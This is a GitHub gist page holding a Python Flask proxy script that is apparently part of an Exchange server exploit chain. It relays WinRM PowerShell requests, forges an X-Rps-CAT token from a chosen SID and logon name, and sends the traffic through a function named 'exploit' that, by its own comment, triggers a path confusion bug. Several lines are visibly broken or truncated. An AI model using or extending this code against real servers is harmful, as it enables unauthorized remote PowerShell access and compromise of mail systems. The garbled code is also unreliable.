Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
app = Flask(__name__)
@app.route('/<path:path>', methods = ['POST', 'GET'])
def index(path):
if request.method == 'GET':
return 'ok'
# check data
data =
action ='<a:Action s:mustUnderstand="true">(.+?)</a:Action>', data)
assert action, "WinRM action not found"
# modify headers
req_headers = {}
for k, v in request.headers.iteritems():
if k == 'Host':
v = HOST
if k == 'Authorization':
req_headers[k] = v
# create X-Rps-CAT token
token = b64encode(create_token(SID, LOGON_NAME))
# rewrite to `autodiscover` and trigger the path confusion bug
r = exploit('/Powershell?X-Rps-CAT=' + token, headers=req_headers, data=data)
# make response
resp = Response(r.content, status=r.status_code)
for k, v in r.headers.iteritems():
if k in ['Content-Encoding', 'Content-Length', 'Transfer-Encoding']:
resp.headers[k] = v
return resp"", port=8000)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment